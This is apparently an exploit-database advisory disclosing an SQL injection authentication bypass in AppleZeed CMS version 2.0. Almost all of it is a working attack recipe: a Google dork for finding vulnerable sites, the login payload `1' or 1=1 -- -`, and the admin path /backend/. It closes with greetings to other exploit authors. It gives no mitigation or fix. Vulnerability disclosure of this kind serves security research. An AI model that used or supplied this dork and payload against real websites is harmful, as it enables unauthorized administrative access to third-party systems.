Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

====================================================================================================================================
| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | 
| # Vendor    : https://applezeed.com                                                                                              |  
| # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : user & pass = 1' or 1=1 -- -

[+] admin path = /backend/

[+] http://TARGET/backend/

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================

RELATED ARTICLESMORE FROM AUTHOR